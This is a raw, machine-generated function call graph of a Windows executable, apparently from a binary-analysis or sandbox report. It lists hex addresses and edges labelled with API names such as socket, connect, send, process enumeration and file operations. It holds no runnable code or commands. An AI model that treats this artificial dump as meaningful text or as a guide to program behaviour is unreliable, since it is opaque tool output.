103589 50944a #16 103588->103589 103588->103599 103590 509463 103589->103590 103591 5094f5 WSAGetLastError 103589->103591 103592 50947b _strlen 103590->103592 103593 4bcdb4 48 API calls 103590->103593 103590->103599 103591->103599 103594 5094be 103592->103594 103595 50948e 103592->103595 103593->103592 104929 4fad14 48 API calls _memset 103594->104929 104927 4ee0f5 48 API calls 2 library calls 103595->104927 103598 509497 104928 50ae5a 50 API calls 103598->104928 103599->103108 103601 5094a3 103602 4b7bef 48 API calls 103601->103602 103602->103599 103604 500157 103603->103604 103605 50015e 103603->103605 103607 4b84a6 81 API calls 103604->103607 103606 4b84a6 81 API calls 103605->103606 103606->103604 103608 50017c 103607->103608 104930 4f76db GetFileVersionInfoSizeW 103608->104930 103610 50018d 103611 500192 103610->103611 103613 5001a3 _wcscmp 103610->103613 103612 4bca8e 48 API calls 103611->103612 103615 5001a1 103612->103615 103614 4bca8e 48 API calls 103613->103614 103614->103615 103615->103108 103617 4bca8e 48 API calls 103616->103617 103618 4cef25 103617->103618 103619 4cef3e 103618->103619 103620 4ceffb 103618->103620 104969 4cf0f3 48 API calls 103619->104969 103621 4d010a 48 API calls 103620->103621 103623 4cf002 103621->103623 103624 4cf00e 103623->103624 104971 4b5080 49 API calls 103623->104971 103628 4b84a6 81 API calls 103624->103628 103626 4cef4d 103627 4cef73 103626->103627 103630 526942 103626->103630 103631 4bcdb4 48 API calls 103626->103631 103629 4cf03e 2 API calls 103627->103629 103632 4cf01c 103628->103632 103633 4cef7a 103629->103633 103630->103108 103634 526965 103631->103634 103635 4b4bf9 56 API calls 103632->103635 103637 526980 103633->103637 103638 4cef87 103633->103638 103634->103627 103639 52696d 103634->103639 103636 4cf02b 103635->103636 103636->103626 103640 526936 103636->103640 103641 4d010a 48 API calls 103637->103641 103642 4bd3d2 48 API calls 103638->103642 103643 4bcdb4 48 API calls 103639->103643 103640->103630 104972 4b4592 CloseHandle 103640->104972 103644 526986 103641->103644 103645 4cef8f 103642->103645 103643->103633 103646 52699f 103644->103646 104973 4b3d65 ReadFile SetFilePointerEx 103644->104973 104946 4cf04e 103645->104946 103653 5269a3 _memmove 103646->103653 104974 4fad14 48 API calls _memset 103646->104974 103650 4cef9e 103652 4b7bef 48 API calls 103650->103652 103650->103653 103654 4cefb2 Mailbox 103652->103654 103655 4ceff2 103654->103655 103656 4b50ec CloseHandle 103654->103656 103655->103108 103657 4cefe4 103656->103657 104970 4b4592 CloseHandle 103657->104970 103660 4cf0b5 2 API calls 103659->103660 103661 4cf046 103660->103661 103661->103108 103663 4b84a6 81 API calls 103662->103663 103664 50913f 103663->103664 103665 4bcdb4 48 API calls 103664->103665 103666 509149 103665->103666 104998 50acd3 103666->104998 103668 509156 103669 50915a socket 103668->103669 103673 509182 103668->103673 103670 509184 connect 103669->103670 103671 50916d WSAGetLastError 103669->103671 103672 5091a3 WSAGetLastError 103670->103672 103670->103673 103671->103673 105004 4fd7e4 103672->105004 103673->103108 103675 5091b8 closesocket 103675->103673 105019 50f79f 103676->105019 103678 510c0a 103678->103108 105094 5123c5 103679->105094 103683 4b84a6 81 API calls 103682->103683 103684 5110fb LoadLibraryW 103683->103684 103685 51111e 103684->103685 103686 51110f 103684->103686 103685->103686 105178 5128d9 48 API calls _memmove 103685->105178 103686->103108 103688->103108 103690 4bcafd __NMSG_WRITE _memmove 103689->103690 103691 4d010a 48 API calls 103690->103691 103692 4bcb3b 103691->103692 103692->103107 103693->103108 103694->103108 103695->103108 103696->103108 103697->103107 103698->103101 103699->103082 103700->103078 103701->103087 103702->103094 103835 4bd3d2 103703->103835 103705 50f389 Mailbox 103707 50f3e1 103705->103707 103708 50f3cd 103705->103708 103723 50f3a9 103705->103723 103706 4bd89e 50 API calls 103718 50f421 Mailbox 103706->103718 103710 4bc935 48 API calls 103707->103710 103846 4b7e53 103708->103846 103711 50f3df 103710->103711 103712 50f429 103711->103712 103855 50cdb5 420 API calls 103711->103855 103840 50cd12 103712->103840 103714 50f410 103714->103712 103716 50f414 103714->103716 103856 4fd338 86 API calls 4 library calls 103716->103856 103717 50f44b 103720 50f4a2 103717->103720 103722 50f457 103717->103722 103718->103266 103721 50f34f 420 API calls 103720->103721 103721->103718 103722->103723 103724 50f476 103722->103724 103723->103706 103725 4bca8e 48 API calls 103724->103725 103725->103718 103726->103252 103727->103263 103728->103263 103729->103246 103730->103263 103731->103253 103732->103246 103733->103246 103734->103282 103735->103303 103737 4c469f 103736->103737 103738 4c4537 103736->103738 103741 4bcaee 48 API calls 103737->103741 103739 527820 103738->103739 103740 4c4543 103738->103740 104105 50e713 420 API calls Mailbox 103739->104105 103933 4c4040 103740->103933 103748 4c45e4 Mailbox 103741->103748 103744 52782c 103745 4c4639 Mailbox 103744->103745 104106 4fd520 86 API calls 4 library calls 103744->104106 103745->103266 103747 4c4559 103747->103744 103747->103745 103747->103748 103756 511f19 134 API calls 103748->103756 103948 509500 103748->103948 103957 4cf55e 103748->103957 103966 4fdce9 103748->103966 103971 5095af WSAStartup 103748->103971 103973 51352a 103748->103973 104061 506fc3 103748->104061 104064 4b50ec 103748->104064 104068 4fefcd 103748->104068 104102 501080 103748->104102 103756->103745 103759->103296 103760->103302 103761->103306 104655 4ba9a0 103762->104655 103764 4c36e7 103765 4c3778 103764->103765 103766 52a269 103764->103766 103821 4c3aa8 103764->103821 104667 4cbc04 86 API calls 103765->104667 104672 4fd520 86 API calls 4 library calls 103766->104672 103771 52a3e9 104677 4fd520 86 API calls 4 library calls 103771->104677 103772 4c3793 103772->103821 103823 4c396b Mailbox _memmove 103772->103823 103826 52a68d 103772->103826 104660 4b10e8 103772->104660 103773 4cbc5c 48 API calls 103773->103823 103777 52a583 103782 4bfa40 420 API calls 103777->103782 103778 52a45c 104681 4fd520 86 API calls 4 library calls 103778->104681 103779 52a289 103779->103771 103780 4bd2d2 53 API calls 103779->103780 103783 52a2fb 103780->103783 103784 52a5b5 103782->103784 103786 52a303 103783->103786 103787 52a40f 103783->103787 103790 4bd380 55 API calls 103784->103790 103784->103821 103800 52a317 103786->103800 103808 52a341 103786->103808 104678 4ccf79 49 API calls 103787->104678 103789 4c384e 103793 4c38e5 103789->103793 103794 52a60c 103789->103794 103789->103823 103796 52a5e6 103790->103796 104685 4fd520 86 API calls 4 library calls 103796->104685 103797 4bfa40 420 API calls 103797->103823 103799 52a42c 104673 4fd520 86 API calls 4 library calls 103800->104673 103809 52a366 103808->103809 103813 52a384 103808->103813 104674 50f211 420 API calls 103809->104674 103810 4bd89e 50 API calls 103810->103823 103814 52a37a 103813->103814 104675 50f4df 420 API calls 103813->104675 103814->103821 103818 4c399f 103819 4bc935 48 API calls 103818->103819 103820 4c39c0 103818->103820 103819->103820 103820->103821 103825 52a65e 103820->103825 103830 4c3a05 103820->103830 103831 4c3ab5 Mailbox 103821->103831 104671 4fd520 86 API calls 4 library calls 103821->104671 103823->103773 103823->103777 103823->103778 103823->103779 103823->103796 103823->103797 103823->103810 103823->103818 103823->103821 103824 4d010a 48 API calls 103823->103824 104668 4bd500 53 API calls __cinit 103823->104668 104669 4bd420 53 API calls 103823->104669 104670 4cbaef 48 API calls _memmove 103823->104670 104682 50d21a 82 API calls Mailbox 103823->104682 104683 4f89e0 53 API calls 103823->104683 104684 4bd772 55 API calls 103823->104684 103824->103823 103827 4bd89e 50 API calls 103825->103827 103826->103821 104687 4fd520 86 API calls 4 library calls 103826->104687 103827->103826 103828 4c3a95 103829 4bd89e 50 API calls 103828->103829 103829->103821 103830->103821 103830->103826 103830->103828 103831->103266 103832->103266 103833->103281 103834->103287 103836 4d010a 48 API calls 103835->103836 103837 4bd3f3 103836->103837 103838 4d010a 48 API calls 103837->103838 103839 4bd401 103838->103839 103839->103705 103841 50cd21 103840->103841 103845 50cd46 103840->103845 103842 4bca8e 48 API calls 103841->103842 103843 50cd2d 103842->103843 103857 50c8b7 103843->103857 103845->103717 103847 4b7ecf 103846->103847 103849 4b7e5f __NMSG_WRITE 103846->103849 103925 4ba2fb 103847->103925 103850 4b7e7b 103849->103850 103851 4b7ec7 103849->103851 103921 4ba6f8 103850->103921 103924 4b7eda 48 API calls 103851->103924 103854 4b7e85 _memmove 103854->103711 103855->103714 103856->103718 103859 50c914 103857->103859 103860 50c8f7 103857->103860 103915 50c235 420 API calls Mailbox 103859->103915 103860->103859 103861 50cc61 103860->103861 103862 50c934 103860->103862 103863 50cca9 103861->103863 103864 50cc6e 103861->103864 103862->103859 103893 4eabf3 103862->103893 103863->103859 103868 50ccb6 103863->103868 103911 4cd6b4 48 API calls 103864->103911 103866 50c964 103866->103859 103869 50c973 103866->103869 103913 4cd6b4 48 API calls 103868->103913 103879 50c9a1 103869->103879 103897 4ea8c8 103869->103897 103870 50cc87 103912 4f97b6 89 API calls 103870->103912 103874 50ccd6 103914 4f503c 91 API calls Mailbox 103874->103914 103876 50cadc VariantInit 103884 50cb11 _memset 103876->103884 103880 50ca4a 103879->103880 103907 4ea25b 106 API calls 103879->103907 103880->103876 103881 50ca86 VariantClear 103880->103881 103881->103880 103882 50caa5 SysAllocString 103881->103882 103882->103880 103890 50cc52 103890->103845 103894 4eac16 103893->103894 103895 4eac04 __NMSG_WRITE 103893->103895 103894->103866 103895->103894 103916 4b3bcf 103895->103916 103899 4ea8f2 103897->103899 103898 4ea9ed SysFreeString 103902 4ea9f9 103898->103902 103899->103898 103900 4eaa7e 103899->103900 103901 4ea90a 103899->103901 103899->103902 103900->103901 103900->103902 103901->103879 103902->103901 103907->103879 103911->103870 103912->103890 103913->103874 103914->103890 103915->103890 103917 4b3bd9 __NMSG_WRITE 103916->103917 103918 4d010a 48 API calls 103917->103918 103919 4b3bee _wcscpy 103918->103919 103919->103894 103922 4d010a 48 API calls 103921->103922 103923 4ba702 103922->103923 103923->103854 103924->103854 103926 4ba321 _memmove 103925->103926 103927 4ba309 103925->103927 103926->103854 103927->103926 103929 4bb8a7 103927->103929 103930 4bb8ba 103929->103930 103932 4bb8b7 _memmove 103929->103932 103931 4d010a 48 API calls 103930->103931 103931->103932 103932->103926 103934 52787b 103933->103934 103937 4c406c 103933->103937 104108 4fd520 86 API calls 4 library calls 103934->104108 103936 52788c 104109 4fd520 86 API calls 4 library calls 103936->104109 103937->103936 103945 4c40a6 _memmove 103937->103945 103939 4c4175 103944 4c4185 103939->103944 104107 50d21a 82 API calls Mailbox 103939->104107 103941 4d010a 48 API calls 103941->103945 103942 4c41f1 103942->103747 103943 4bfa40 420 API calls 103943->103945 103944->103747 103945->103939 103945->103941 103945->103943 103945->103944 103946 5278d8 103945->103946 104110 4fd520 86 API calls 4 library calls 103946->104110 103949 4bcdb4 48 API calls 103948->103949 103950 509515 103949->103950 104111 4fbe47 103950->104111 103952 509522 103953 50952f send 103952->103953 103954 509546 103953->103954 103955 509552 WSAGetLastError 103954->103955 103956 50956a 103954->103956 103955->103956 103956->103745 103958 4bcdb4 48 API calls 103957->103958 103959 4cf572 103958->103959 103960 5275d1 Sleep 103959->103960 103961 4cf57a timeGetTime 103959->103961 103962 4bcdb4 48 API calls 103961->103962 103963 4cf590 103962->103963 104116 4be1f0 103963->104116 103967 4b84a6 81 API calls 103966->103967 103968 4fdcfc 103967->103968 104376 4f6d6d 103968->104376 103970 4fdd06 103970->103745 103972 5095e0 103971->103972 103972->103745 103974 4bd3d2 48 API calls 103973->103974 103975 51354a 103974->103975 103976 4bd3d2 48 API calls 103975->103976 103977 513553 103976->103977 103978 4bd3d2 48 API calls 103977->103978 103979 51355c 103978->103979 103980 4b84a6 81 API calls 103979->103980 103989 5135e9 Mailbox 103979->103989 103981 513580 103980->103981 104388 513d7b 103981->104388 103989->103745 104062 4b84a6 81 API calls 104061->104062 104063 506fd6 SetWindowTextW 104062->104063 104063->103745 104065 4b50f6 104064->104065 104066 4b5105 104064->104066 104065->103745 104066->104065 104067 4b510a CloseHandle 104066->104067 104067->104065 104069 4b84a6 81 API calls 104068->104069 104070 4feff2 104069->104070 104453 4f78ad GetFullPathNameW 104070->104453 104075 4ff04b CoInitialize CoCreateInstance 104076 4ff08e 104075->104076 104077 4ff070 104075->104077 104079 4b84a6 81 API calls 104076->104079 104080 4ff07a CoUninitialize 104077->104080 104081 4ff09d 104079->104081 104082 4ff23c Mailbox 104080->104082 104082->103745 104469 5022e5 104102->104469 104104 501090 104104->103745 104105->103744 104106->103745 104107->103942 104108->103936 104109->103944 104110->103944 104112 4fbe55 104111->104112 104113 4fbe50 104111->104113 104112->103952 104115 4fae06 50 API calls 2 library calls 104113->104115 104115->104112 104117 4be216 104116->104117 104177 4be226 Mailbox 104116->104177 104119 4be670 104117->104119 104117->104177 104118 4fd520 86 API calls 104118->104177 104246 4cecee 420 API calls 104119->104246 104121 4be4e7 104123 4be4fd 104121->104123 104247 4b322e 16 API calls 104121->104247 104123->103745 104124 4be681 104124->104123 104126 4be68e 104124->104126 104125 4be26c PeekMessageW 104125->104177 104248 4cec33 420 API calls Mailbox 104126->104248 104128 525b13 Sleep 104128->104177 104129 4be695 LockWindowUpdate DestroyWindow GetMessageW 104129->104123 104131 4be6c7 104129->104131 104135 4be657 PeekMessageW 104135->104177 104136 4be517 timeGetTime 104136->104177 104138 4bc935 48 API calls 104138->104177 104139 4be641 TranslateMessage DispatchMessageW 104139->104135 104140 4d010a 48 API calls 104140->104177 104141 525dfc WaitForSingleObject 104144 525e19 GetExitCodeProcess CloseHandle 104141->104144 104141->104177 104142 4bd3d2 48 API calls 104173 525cce Mailbox 104142->104173 104143 526147 Sleep 104143->104173 104144->104177 104145 4be6cc timeGetTime 104249 4ccf79 49 API calls 104145->104249 104148 525feb Sleep 104148->104177 104151 4b1000 396 API calls 104151->104177 104153 5261de GetExitCodeProcess 104156 5261f4 WaitForSingleObject 104153->104156 104157 52620a CloseHandle 104153->104157 104155 525cea Sleep 104155->104177 104156->104157 104156->104177 104157->104173 104158 525cd7 Sleep 104158->104155 104159 518a48 108 API calls 104159->104173 104160 4b1dce 107 API calls 104160->104177 104162 526266 Sleep 104162->104177 104163 4ccf79 49 API calls 104163->104177 104166 4bcaee 48 API calls 104166->104173 104168 4bfa40 396 API calls 104168->104177 104169 4bd380 55 API calls 104169->104173 104171 4c44e0 396 API calls 104171->104177 104172 4c3680 396 API calls 104172->104177 104173->104142 104173->104153 104173->104155 104173->104158 104173->104159 104173->104162 104173->104166 104173->104169 104173->104177 104251 4f56dc 49 API calls Mailbox 104173->104251 104252 4ccf79 49 API calls 104173->104252 104253 4b1000 420 API calls 104173->104253 104255 50d12a 50 API calls 104173->104255 104256 4f8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104173->104256 104257 4ce3a5 timeGetTime 104173->104257 104258 4f6f5b CreateToolhelp32Snapshot Process32FirstW 104173->104258 104175 4bd380 55 API calls 104175->104177 104176 4bcaee 48 API calls 104176->104177 104177->104118 104177->104121 104177->104125 104177->104128 104177->104135 104177->104136 104177->104138 104177->104139 104177->104140 104177->104141 104177->104143 104177->104145 104177->104148 104177->104151 104177->104155 104177->104160 104177->104163 104177->104168 104177->104171 104177->104172 104177->104173 104177->104175 104177->104176 104178 4be7e0 104177->104178 104185 4bea00 104177->104185 104235 4cf381 104177->104235 104240 4ced1a 104177->104240 104245 4be7b0 420 API calls Mailbox 104177->104245 104250 518b20 48 API calls 104177->104250 104254 4ce3a5 timeGetTime 104177->104254 104179 4be80f 104178->104179 104180 4be7fd 104178->104180 104296 4fd520 86 API calls 4 library calls 104179->104296 104265 4bdcd0 104180->104265 104183 4be806 104183->104177 104184 5298e8 104184->104184 104186 4bea20 104185->104186 104187 4bfa40 420 API calls 104186->104187 104192 4bea89 104186->104192 104189 529919 104187->104189 104188 5299bc 104311 4fd520 86 API calls 4 library calls 104188->104311 104189->104192 104308 4fd520 86 API calls 4 library calls 104189->104308 104190 4bfa40 420 API calls 104217 4becd7 Mailbox 104190->104217 104195 4bd3d2 48 API calls 104192->104195 104215 4beb18 104192->104215 104192->104217 104193 4bd3d2 48 API calls 104196 529997 104193->104196 104197 529963 104195->104197 104310 4d1b2a 52 API calls __cinit 104196->104310 104309 4d1b2a 52 API calls __cinit 104197->104309 104199 4bd380 55 API calls 104199->104217 104201 529d70 104320 50e2fb 420 API calls Mailbox 104201->104320 104203 529e49 104325 4fd520 86 API calls 4 library calls 104203->104325 104204 529dc2 104322 4fd520 86 API calls 4 library calls 104204->104322 104205 529ddf 104323 50c235 420 API calls Mailbox 104205->104323 104209 4b342c 48 API calls 104209->104217 104211 4c14a0 48 API calls 104211->104217 104214 529df7 104234 4bef0c Mailbox 104214->104234 104215->104193 104215->104217 104217->104188 104217->104190 104217->104199 104217->104201 104217->104203 104217->104204 104217->104205 104217->104209 104217->104211 104218 4bf56f 104217->104218 104221 4fd520 86 API calls 104217->104221 104222 529a3c 104217->104222 104217->104234 104304 4bd805 104217->104304 104312 4fa3ee 48 API calls 104217->104312 104313 50ede9 420 API calls 104217->104313 104318 4ea599 InterlockedDecrement 104217->104318 104319 50f4df 420 API calls 104217->104319 104218->104234 104321 4fd520 86 API calls 4 library calls 104218->104321 104221->104217 104314 50d154 48 API calls 104222->104314 104234->104177 104236 52ee11 104235->104236 104237 4cf390 104235->104237 104238 52ee46 104236->104238 104239 52ee28 TranslateAcceleratorW 104236->104239 104237->104177 104239->104237 104241 4ced2c 104240->104241 104243 4ced34 104240->104243 104241->104177 104242 4ced5e IsDialogMessageW 104242->104241 104242->104243 104243->104241 104243->104242 104244 52ebec GetClassLongW 104243->104244 104244->104242 104244->104243 104245->104177 104246->104121 104247->104124 104248->104129 104249->104177 104250->104177 104251->104173 104252->104173 104253->104173 104254->104177 104255->104173 104256->104173 104257->104173 104326 4f79c2 104258->104326 104260 4f6fa4 Process32NextW 104261 4f7021 CloseHandle 104260->104261 104264 4f6fa0 _wcscat 104260->104264 104261->104173 104264->104260 104264->104261 104332 4d297d 104264->104332 104335 4d1bc7 104264->104335 104266 4bfa40 420 API calls 104265->104266 104277 4bdd0f _memmove 104266->104277 104267 528dbe 104303 4fd520 86 API calls 4 library calls 104267->104303 104270 4bdd70 104270->104183 104271 4be12b Mailbox 104273 4d010a 48 API calls 104271->104273 104277->104267 104277->104270 104277->104271 104279 4d010a 48 API calls 104277->104279 104281 4bdeb7 104277->104281 104291 4bdf29 104277->104291 104279->104277 104281->104271 104296->104184 104305 4bd828 _memmove 104304->104305 104306 4bd815 104304->104306 104305->104217 104306->104305 104308->104192 104309->104215 104310->104217 104311->104234 104312->104217 104313->104217 104318->104217 104319->104217 104320->104218 104321->104234 104322->104234 104323->104214 104325->104234 104327 4f79e9 104326->104327 104328 4f79d0 104326->104328 104346 4d224a 58 API calls __wcstoi64 104327->104346 104328->104327 104330 4f79ef 104328->104330 104345 4d22df GetStringTypeW __wtof_l 104328->104345 104330->104264 104345->104328 104346->104330 104377 4f6d8a __NMSG_WRITE 104376->104377 104378 4f6db3 GetFileAttributesW 104377->104378 104379 4f6dc5 GetLastError 104378->104379 104386 4f6de3 104378->104386 104380 4f6de7 104379->104380 104381 4f6dd0 CreateDirectoryW 104379->104381 104382 4b3bcf 48 API calls 104380->104382 104380->104386 104381->104380 104381->104386 104383 4f6df7 _wcsrchr 104382->104383 104384 4f6d6d 48 API calls 104383->104384 104383->104386 104385 4f6e1b 104384->104385 104385->104386 104387 4f6e28 CreateDirectoryW 104385->104387 104386->103970 104387->104386 104422 4bc4cd 104388->104422 104390 513d89 104391 4bc4cd 48 API calls 104390->104391 104392 513d91 104391->104392 104423 4bc4da 104422->104423 104424 4bc4e7 104422->104424 104423->104390 104425 4d010a 48 API calls 104424->104425 104425->104423 104454 4b7e53 48 API calls 104453->104454 104455 4f78df 104454->104455 104456 4ce617 48 API calls 104455->104456 104457 4f78eb 104456->104457 104458 50267a 104457->104458 104460 5026a4 __NMSG_WRITE 104458->104460 104459 4ff039 104459->104075 104465 4b39e8 48 API calls 2 library calls 104459->104465 104460->104459 104461 502763 104460->104461 104462 5026d8 104460->104462 104461->104459 104468 4cdfd2 60 API calls 104461->104468 104462->104459 104467 4cdfd2 60 API calls 104462->104467 104465->104075 104467->104462 104468->104461 104470 502306 104469->104470 104471 502365 104470->104471 104472 50230a 104470->104472 104538 4cf0f3 48 API calls 104471->104538 104473 4d010a 48 API calls 104472->104473 104475 502311 104473->104475 104476 50231f 104475->104476 104525 4b5080 49 API calls 104475->104525 104478 4b84a6 81 API calls 104476->104478 104480 502331 104478->104480 104479 502379 104481 50234d 104479->104481 104483 50243f 104479->104483 104486 5023bb 104479->104486 104526 4b4bf9 104480->104526 104481->104104 104484 4fbe47 50 API calls 104483->104484 104487 502446 104484->104487 104489 4b84a6 81 API calls 104486->104489 104545 4f689f SetFilePointerEx SetFilePointerEx WriteFile 104487->104545 104490 5023c2 104489->104490 104492 5023f6 104490->104492 104501 502400 104490->104501 104507 4f67dc 104492->104507 104496 5023fe Mailbox 104496->104481 104503 4b50ec CloseHandle 104496->104503 104539 4b7b6e 104501->104539 104504 502490 104503->104504 104546 4b4592 CloseHandle 104504->104546 104508 4f67ec 104507->104508 104509 4f67f6 104507->104509 104563 4f6917 SetFilePointerEx SetFilePointerEx WriteFile 104508->104563 104511 4f67fc 104509->104511 104512 4f6808 104509->104512 104564 4f68b9 51 API calls 104511->104564 104514 4f6824 104512->104514 104515 4f6811 104512->104515 104547 4ba6d4 104514->104547 104516 4ba6d4 48 API calls 104515->104516 104518 4f67f4 Mailbox 104518->104496 104525->104476 104527 4b50ec CloseHandle 104526->104527 104528 4b4c04 104527->104528 104601 4b4b88 104528->104601 104538->104479 104540 4d010a 48 API calls 104539->104540 104541 4b7b93 104540->104541 104542 4ba6f8 48 API calls 104541->104542 104545->104496 104546->104481 104563->104518 104564->104518 104602 524957 104601->104602 104603 4b4ba1 CreateFileW 104601->104603 104656 4ba9af 104655->104656 104659 4ba9ca 104655->104659 104657 4bb8a7 48 API calls 104656->104657 104658 4ba9b7 CharUpperBuffW 104657->104658 104658->104659 104659->103764 104661 4b10f9 104660->104661 104662 524c5a 104660->104662 104663 4d010a 48 API calls 104661->104663 104664 4b1100 104663->104664 104665 4b1121 104664->104665 104688 4b113c 48 API calls 104664->104688 104665->103789 104667->103772 104668->103823 104669->103823 104670->103823 104671->103831 104672->103772 104673->103821 104674->103814 104675->103814 104677->103821 104678->103799 104681->103821 104682->103823 104683->103823 104684->103823 104685->103821 104687->103821 104688->104665 104690 4bd89e 50 API calls 104689->104690 104691 4b1a08 104690->104691 104692 4b1a12 104691->104692 104693 52db7d 104691->104693 104694 4b84a6 81 API calls 104692->104694 104695 4b7e53 48 API calls 104693->104695 104696 4b1a1f 104694->104696 104697 52db8d 104695->104697 104698 4bc935 48 API calls 104696->104698 104697->104697 104699 4b1a2d 104698->104699 104700 4b1dce 104699->104700 104701 4b1de4 Mailbox 104700->104701 104702 52db26 104701->104702 104706 4b1dfd 104701->104706 104703 52db2b IsWindow 104702->104703 104704 4b1e51 104703->104704 104705 52db3f 104703->104705 104704->103312 104768 4b200a 104705->104768 104707 4b1e46 104706->104707 104709 4b84a6 81 API calls 104706->104709 104707->104704 104711 52db65 IsWindow 104707->104711 104712 4b1e17 104709->104712 104711->104704 104711->104705 104715 4b1f04 104712->104715 104716 4b1f1a Mailbox 104715->104716 104717 4bc935 48 API calls 104716->104717 104718 4b1f3e 104717->104718 104719 4bc935 48 API calls 104718->104719 104720 4b1f49 104719->104720 104721 4b7e53 48 API calls 104720->104721 104722 4b1f59 104721->104722 104723 4bd3d2 48 API calls 104722->104723 104724 4b1f87 104723->104724 104725 4bd3d2 48 API calls 104724->104725 104726 4b1f90 104725->104726 104727 4bd3d2 48 API calls 104726->104727 104728 4b1f99 104727->104728 104729 522569 104728->104729 104730 4b1fac 104728->104730 104778 4ee4ea 60 API calls 3 library calls 104729->104778 104769 4b2016 104768->104769 104770 4d010a 48 API calls 104769->104770 104771 4b2023 104770->104771 104772 4b197e 104771->104772 104773 4b1990 104772->104773 104777 4b19af _memmove 104772->104777 104775 4d010a 48 API calls 104773->104775 104774 4d010a 48 API calls 104776 4b19c6 104774->104776 104775->104777 104776->104704 104777->104774 104813->103336 104814->103351 104815->103351 104816->103362 104817->103356 104818->103351 104819->103353 104821 4b816b 104820->104821 104822 4b80f9 104820->104822 104823 4ba2fb 48 API calls 104821->104823 104822->104821 104824 4b8105 104822->104824 104831 4b813a _memmove 104823->104831 104825 4b8163 104824->104825 104826 4b8110 104824->104826 104855 4b7eda 48 API calls 104825->104855 104828 4ba6f8 48 API calls 104826->104828 104829 4b811a 104828->104829 104830 4d010a 48 API calls 104829->104830 104830->104831 104831->103430 104833 4b3334 104832->104833 104835 4b3339 Mailbox 104832->104835 104856 4b342c 48 API calls 104833->104856 104840 4b3347 104835->104840 104857 4b346e 48 API calls 104835->104857 104837 4d010a 48 API calls 104839 4b33d8 104837->104839 104838 4b3422 104838->103414 104841 4d010a 48 API calls 104839->104841 104840->104837 104840->104838 104842 4b33e3 104841->104842 104842->103414 104843->103430 104845 4d010a 48 API calls 104844->104845 104846 4b818f 104845->104846 104846->103430 104847->103430 104848->103411 104849->103411 104850->103430 104851->103375 104852->103431 104853->103392 104854->103417 104855->104831 104856->104835 104857->104840 104858->103442 104859->103454 104860->103464 104861->103465 104862->103511 104864 4cdd89 104863->104864 104865 524a7d FindFirstFileW 104863->104865 104864->103108 104866 524a95 FindClose 104865->104866 104867 524a8e 104865->104867 104867->104866 104869 506b42 104868->104869 104870 506b25 GetWindowRect 104868->104870 104871 506b5c 104869->104871 104872 506b52 ClientToScreen 104869->104872 104870->104871 104871->103532 104871->103535 104872->104871 104873->103538 104874->103542 104875->103556 104876->103558 104878 4b7bfb 104877->104878 104879 4b7c3a 104877->104879 104881 4d010a 48 API calls 104878->104881 104880 4bc935 48 API calls 104879->104880 104882 4b7c0e 104880->104882 104881->104882 104882->103560 104884 4bc4cd 48 API calls 104883->104884 104885 4ee2fe 104884->104885 104900 4b193b SendMessageTimeoutW 104885->104900 104887 4ee305 104899 4ee309 Mailbox 104887->104899 104901 4ee390 104887->104901 104889 4ee314 104890 4d010a 48 API calls 104889->104890 104891 4ee338 SendMessageW 104890->104891 104892 4ee34e _strlen 104891->104892 104891->104899 104893 4ee35a 104892->104893 104894 4ee378 104892->104894 104906 4ee0f5 48 API calls 2 library calls 104893->104906 104895 4b7e53 48 API calls 104894->104895 104895->104899 104897 4ee362 104907 4bc610 MultiByteToWideChar 104897->104907 104899->103572 104900->104887 104926 4b193b SendMessageTimeoutW 104901->104926 104903 4ee39a 104904 4ee39e 104903->104904 104905 4ee3a2 SendMessageW 104903->104905 104904->104889 104905->104889 104906->104897 104908 4bc638 104907->104908 104909 5224df 104907->104909 104911 4d010a 48 API calls 104908->104911 104910 4bc4cd 48 API calls 104909->104910 104912 5224e7 104910->104912 104913 4bc64f MultiByteToWideChar 104911->104913 104919 4ba6f8 48 API calls 104912->104919 104914 4bc66c 104913->104914 104915 4bc6b7 104913->104915 104914->104915 104917 4bc675 104914->104917 104916 4ba2fb 48 API calls 104915->104916 104917->104912 104920 5224f6 104919->104920 104926->104903 104927->103598 104928->103601 104929->103599 104931 4f7700 104930->104931 104942 4f76f9 _wcsncpy 104930->104942 104932 4d010a 48 API calls 104931->104932 104933 4f7706 GetFileVersionInfoW 104932->104933 104934 4f7722 __NMSG_WRITE 104933->104934 104935 4d010a 48 API calls 104934->104935 104937 4f7739 _wcscat _wcscmp _wcscpy _wcsstr 104935->104937 104936 4d1bc7 _W_store_winword 59 API calls 104938 4f77f7 104936->104938 104940 4f7779 VerQueryValueW 104937->104940 104944 4f7793 _wcscat 104937->104944 104939 4f7827 VerQueryValueW 104938->104939 104938->104942 104941 4f783d _wcscmp 104939->104941 104939->104942 104940->104944 104941->104942 104945 4d234b 80 API calls 3 library calls 104941->104945 104942->103610 104944->104936 104945->104942 104947 4cf069 104946->104947 104948 4cf057 104946->104948 104951 4bc4cd 48 API calls 104947->104951 104949 4cf05d 104948->104949 104950 4cf063 104948->104950 104952 4ba6d4 48 API calls 104949->104952 104953 4ba6d4 48 API calls 104950->104953 104967 4f64f5 104951->104967 104954 4cf081 104952->104954 104955 4f668b 104953->104955 104975 4b4c4f 104954->104975 104958 4b4c4f 50 API calls 104955->104958 104960 4f6699 104958->104960 104963 4f66a9 Mailbox 104960->104963 104983 4f6765 50 API calls 104960->104983 104961 5249b2 104963->103650 104965 4f6524 104965->103650 104966 4bc610 50 API calls 104968 4cf0a3 Mailbox 104966->104968 104967->104965 104981 4f649b ReadFile SetFilePointerEx 104967->104981 104982 4bbd2f 48 API calls _memmove 104967->104982 104968->103650 104969->103626 104970->103655 104971->103624 104972->103630 104973->103646 104974->103653 104976 4cf324 48 API calls 104975->104976 104979 4b4c60 104976->104979 104977 4b4c95 104977->104961 104977->104966 104978 4b4ca0 2 API calls 104978->104979 104979->104977 104979->104978 104984 4b4d29 104979->104984 104981->104967 104982->104967 104983->104963 104985 4b4d3d 104984->104985 104986 5245cf 104984->104986 104993 4b4d67 104985->104993 104988 4ba6f8 48 API calls 104986->104988 104990 5245da 104988->104990 104989 4b4d49 104989->104979 104991 4d010a 48 API calls 104990->104991 104992 5245ef _memmove 104991->104992 104994 4b4d7d 104993->104994 104997 4b4d78 _memmove 104993->104997 104995 4d010a 48 API calls 104994->104995 104996 524703 104994->104996 104995->104997 104997->104989 105006 50ae3b 104998->105006 105001 50ad05 Mailbox 105002 50ad31 htons 105001->105002 105003 50ad1b 105001->105003 105002->105003 105003->103668 105005 4fd7f2 105004->105005 105005->103675 105007 4ba6d4 48 API calls 105006->105007 105008 50ae49 105007->105008 105011 50ae79 WideCharToMultiByte 105008->105011 105010 50acf3 inet_addr 105010->105001 105012 50aea7 105011->105012 105013 50ae9d 